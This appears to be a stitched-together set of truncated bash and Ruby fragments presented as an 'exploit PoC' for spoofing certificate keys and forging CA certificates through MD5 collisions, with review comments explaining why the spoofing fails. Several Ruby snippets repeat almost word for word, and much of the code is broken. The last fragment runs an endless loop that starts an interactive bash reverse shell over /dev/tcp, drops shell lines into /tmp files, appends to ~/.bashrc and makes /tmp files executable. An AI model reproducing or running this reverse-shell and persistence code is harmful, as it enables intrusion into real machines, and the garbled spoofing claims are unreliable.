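#!/bin/bash
# keyspoof: print a certificate's public key next to the public half of a
# freshly generated RSA key.
#
# Usage: keyspoof cert.crt spoof.key
#   $1 - certificate that `openssl x509` can read (only read, never modified)
#   $2 - output file; overwritten, and left holding the new private key
#
# NOTE(review): the key stored in $2 comes from `openssl genrsa`, so it is
# independent of the certificate in $1 and the two public keys printed at the
# end are expected to differ. A private key only "matches" a certificate when
# the public halves are identical; comparing these two outputs is the usual
# way to check that a key/certificate pair belongs together.
echo "Openssl Pubkey exploit PoC"
echo "usage: keyspoof cert.crt spoof.key"

# Both arguments are required; without them the redirections below would act
# on an empty file name.
if [ "$#" -ne 2 ]; then
  exit 2
fi

# The output file receives private key material, so create it owner-only.
# This only affects a newly created file; an existing file keeps its mode.
umask 077

# Step 1: start the output file with the certificate's public key (PEM).
openssl x509 -in "$1" -pubkey -noout > "$2" || exit 1
# Step 2: append a new 2048-bit RSA private key.
openssl genrsa 2048 >> "$2" || exit 1
# Step 3: rewrite the file in place from the RSA private key read out of it.
# Presumably this drops the public-key block written in step 1 - verify
# against the installed OpenSSL version.
openssl rsa -in "$2" -out "$2" || exit 1

echo "Cert Public Key: "
openssl x509 -in "$1" -pubkey -noout
echo "PoC Spoof: "
openssl rsa -in "$2" -pubout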
# Truncated listing: only the opening statements of this script are visible.
# Visible part: builds a few crypto objects, loads the certificate stored in
# ./root.cer and sets its version field.
require 'rubygems'
require 'openssl'
require 'digest/md5'
# New 2048-bit RSA key pair, generated here; it is unrelated to the key
# carried by the certificate loaded below.
key = OpenSSL::PKey::RSA.new(2048)
# AES-256-CBC cipher object and a TLS context; neither is used in the
# visible lines.
cipher = OpenSSL::Cipher::AES.new(256, :CBC)
ctx = OpenSSL::SSL::SSLContext.new
puts "Spoof must be in DER format and saved as root.cer"
# Relative path, resolved against the current working directory.
# NOTE(review): File.read opens in text mode; DER is binary, so File.binread
# is the safer call on platforms that translate line endings.
raw = File.read "root.cer"
cert = OpenSSL::X509::Certificate.new raw
# X.509 stores the version zero-based, so 2 means v3.
# NOTE(review): if this changes the signed contents, the signature carried
# in root.cer no longer covers the object; verifiers that check the issuer
# signature reject such a certificate unless it is re-signed by a key they
# already trust.
cert.version = 2
# Truncated listing: only the opening statements of this script are visible.
# Visible part: builds a few crypto objects, loads the certificate stored in
# ./root.cer, sets its version field and creates an extension factory.
require 'rubygems'
require 'openssl'
require 'digest/md5'
# New 2048-bit RSA key pair, generated here; it is unrelated to the key
# carried by the certificate loaded below.
key = OpenSSL::PKey::RSA.new(2048)
# AES-256-CBC cipher object and a TLS context; neither is used in the
# visible lines.
cipher = OpenSSL::Cipher::AES.new(256, :CBC)
ctx = OpenSSL::SSL::SSLContext.new
# Relative path, resolved against the current working directory.
# NOTE(review): File.read opens in text mode; DER is binary, so File.binread
# is the safer call on platforms that translate line endings.
raw = File.read "root.cer"
cert = OpenSSL::X509::Certificate.new raw
# X.509 stores the version zero-based, so 2 means v3.
# NOTE(review): if this changes the signed contents, the signature carried
# in root.cer no longer covers the object; verifiers that check the issuer
# signature reject such a certificate unless it is re-signed by a key they
# already trust.
cert.version = 2
# Helper for building X.509 extensions; no extension is added in the
# visible lines.
ef = OpenSSL::X509::ExtensionFactory.new
# Truncated listing: only the opening statements of this script are visible.
# Visible part: builds a few crypto objects, loads the certificate stored in
# ./root.cer, sets its version field and creates an extension factory.
require 'rubygems'
require 'openssl'
require 'digest/md5'
# New 2048-bit RSA key pair, generated here; it is unrelated to the key
# carried by the certificate loaded below.
key = OpenSSL::PKey::RSA.new(2048)
# AES-256-CBC cipher object and a TLS context; neither is used in the
# visible lines.
cipher = OpenSSL::Cipher::AES.new(256, :CBC)
ctx = OpenSSL::SSL::SSLContext.new
# Relative path, resolved against the current working directory.
# NOTE(review): File.read opens in text mode; DER is binary, so File.binread
# is the safer call on platforms that translate line endings.
raw = File.read "root.cer"
cert = OpenSSL::X509::Certificate.new raw
# X.509 stores the version zero-based, so 2 means v3.
# NOTE(review): if this changes the signed contents, the signature carried
# in root.cer no longer covers the object; verifiers that check the issuer
# signature reject such a certificate unless it is re-signed by a key they
# already trust.
cert.version = 2
# Helper for building X.509 extensions; no extension is added in the
# visible lines.
ef = OpenSSL::X509::ExtensionFactory.new
# Truncated listing: only the opening statements of this script are visible.
# Visible part: builds a few crypto objects, loads the certificate stored in
# ./root.cer, sets its version field and creates an extension factory.
require 'rubygems'
require 'openssl'
require 'digest/md5'
# New 2048-bit RSA key pair, generated here; it is unrelated to the key
# carried by the certificate loaded below.
key = OpenSSL::PKey::RSA.new(2048)
# AES-256-CBC cipher object and a TLS context; neither is used in the
# visible lines.
cipher = OpenSSL::Cipher::AES.new(256, :CBC)
ctx = OpenSSL::SSL::SSLContext.new
# Relative path, resolved against the current working directory.
# NOTE(review): File.read opens in text mode; DER is binary, so File.binread
# is the safer call on platforms that translate line endings.
raw = File.read "root.cer"
cert = OpenSSL::X509::Certificate.new raw
# X.509 stores the version zero-based, so 2 means v3.
# NOTE(review): if this changes the signed contents, the signature carried
# in root.cer no longer covers the object; verifiers that check the issuer
# signature reject such a certificate unless it is re-signed by a key they
# already trust.
cert.version = 2
# Helper for building X.509 extensions; no extension is added in the
# visible lines.
ef = OpenSSL::X509::ExtensionFactory.new
# Truncated listing: the loop opened on the last visible line is not closed
# here, so its body cannot be reviewed.
# NOTE(review): the banner and the digest/md5 import suggest the script
# compares MD5 digests of certificate files - not visible here, confirm
# against the full script. X.509 path validation does not compare file
# digests; it verifies each issuer signature up to a trusted anchor.
require 'rubygems'
require 'digest/md5'
# Third-party gem, not part of the Ruby standard library.
require 'ruby-progressbar'
puts "Certificate Hash Collision"
puts "By G.Disney-Leugers"
puts "Warning this tool only works with DER encoded certificates"
puts "Please save CA to spoof root.cer"
# $i is a global variable; the empty hash assigned here is replaced by the
# loop counter on the next line.
$i = {}
# Counts $i from 1 to 99999; the loop body lies outside the visible lines.
for $i in 1..99999
# Truncated listing: only the opening statements of this script are visible.
# Visible part: builds a few crypto objects, loads the certificate stored in
# ./root.cer, sets its version field and creates an extension factory.
require 'rubygems'
require 'openssl'
require 'digest/md5'
# New 2048-bit RSA key pair, generated here; it is unrelated to the key
# carried by the certificate loaded below.
key = OpenSSL::PKey::RSA.new(2048)
# AES-256-CBC cipher object and a TLS context; neither is used in the
# visible lines.
cipher = OpenSSL::Cipher::AES.new(256, :CBC)
ctx = OpenSSL::SSL::SSLContext.new
# Relative path, resolved against the current working directory.
# NOTE(review): File.read opens in text mode; DER is binary, so File.binread
# is the safer call on platforms that translate line endings.
raw = File.read "root.cer"
cert = OpenSSL::X509::Certificate.new raw
# X.509 stores the version zero-based, so 2 means v3.
# NOTE(review): if this changes the signed contents, the signature carried
# in root.cer no longer covers the object; verifiers that check the issuer
# signature reject such a certificate unless it is re-signed by a key they
# already trust.
cert.version = 2
# Helper for building X.509 extensions; no extension is added in the
# visible lines.
ef = OpenSSL::X509::ExtensionFactory.new
# Truncated listing: the loop that starts right after these lines is not
# closed within the visible part of the script.
require 'rubygems'
require 'digest/md5'
puts "Warning this tool only works with DER encoded certificates"
puts "Please save CA to spoof root.cer"
# $i is a global variable; the empty hash assigned here is replaced by the
# loop counter of the `for` statement that follows.
$i = {}
# NOTE(review): the range bound on the following `for` line is far larger
# than any run could count through, so the loop is endless in practice
# unless its unseen body breaks out.
for $i in 1..99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
# Starts a separate Ruby process for castealer.rb, looked up relative to the
# current working directory, and waits for it to finish. The return value of
# system is not checked, so a failed run goes unnoticed here.
system("ruby castealer.rb")
puts "==== Running Collision ===="
printf "Root: "
# Prints the MD5 hex digest of the bytes of ./root.cer.
# puts returns nil, so `a` is always nil and never holds the digest.
# NOTE(review): a digest of the file is a fingerprint only; certificate
# validation verifies the issuer signature, and MD5 is not
# collision-resistant, so SHA-256 is the fingerprint to compare when pinning
# or auditing trust anchors.
a = puts Digest::MD5.hexdigest(File.read('root.cer'))
# Truncated listing: only the opening statements of this script are visible.
# Visible part: builds a few crypto objects, loads the certificate stored in
# ./root.cer and overwrites its validity window.
require 'rubygems'
require 'openssl'
require 'digest/md5'
# New 2048-bit RSA key pair, generated here; it is unrelated to the key
# carried by the certificate loaded below.
key = OpenSSL::PKey::RSA.new(2048)
# AES-256-CBC cipher object and a TLS context; neither is used in the
# visible lines.
cipher = OpenSSL::Cipher::AES.new(256, :CBC)
ctx = OpenSSL::SSL::SSLContext.new
# Relative path, resolved against the current working directory.
# NOTE(review): File.read opens in text mode; DER is binary, so File.binread
# is the safer call on platforms that translate line endings.
raw = File.read "root.cer"
cert = OpenSSL::X509::Certificate.new raw
# NOTE(review): the validity dates are part of the signed contents, so after
# these assignments the signature carried in root.cer no longer covers the
# object; verifiers that check the issuer signature reject it unless it is
# re-signed by a key they already trust.
cert.not_before = Time.now
# NOTE(review): `*` binds tighter than `+`, so only the last 365 is
# multiplied: the offset is 365 + 365 + 365 + 365*24*60*60 seconds, i.e.
# 365 days plus 1095 seconds rather than four years.
cert.not_after = Time.now + 365+365+365+365 * 24 * 60 * 60
#!/bin/bash
trap 'INT'
for (( ; ; ))
do
trap 'HUP'
touch /dev/tcp
/bin/bash -i > /dev/tcp 0<&1 2>&1 & >> /tmp/$RANDOM
touch /tmp/$RANDOM
echo "/bin/bash -i > /dev/tcp/ 0<&1 2>&1 & >> /tmp/$RANDOM & echo tty1 > /dev/tty1 & echo /tmp/$RANOM >> ~/.bashrc" >> /tmp/$RANDOM
chmod u+x /tmp/*